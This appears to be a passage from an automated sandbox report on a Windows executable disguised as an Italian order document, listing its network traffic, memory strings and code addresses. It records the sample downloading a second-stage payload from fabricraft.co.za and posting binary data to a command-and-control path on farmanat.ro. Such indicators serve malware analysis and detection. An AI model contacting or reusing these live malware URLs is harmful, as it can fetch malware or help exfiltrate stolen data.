        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: lsass.exe, 0000000C.00000000.238314085790.000001896AEE7000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867965216.000001896AEE7000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242866479369.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://ocsp.digicert.com0C
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0G
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://ocsp.digicert.com0O
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312051289.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867684725.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238331126240.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865216162.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://www.digicert.com/CPS0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
        Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com
        Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/.
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binc
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binn
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binws;
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmpString found in binary or memory: https://farmanat.ro/arman30/five/fre.php
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 178Connection: close
        Source: unknownDNS traffic detected: queries for: fabricraft.co.za
        Source: global trafficHTTP traffic detected: GET /Farmant_hhVNwJna195.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fabricraft.co.zaCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 197.242.150.64:443 -> 192.168.11.20:49816 version: TLS 1.2
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022782FF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CF92
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277625
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227622C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276A38
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D203
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278A09
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE73
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE7D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D245
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02272655
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B651
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C251
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227768F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227728D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276AE4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C2E1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276ED6
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B6DF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C2DF
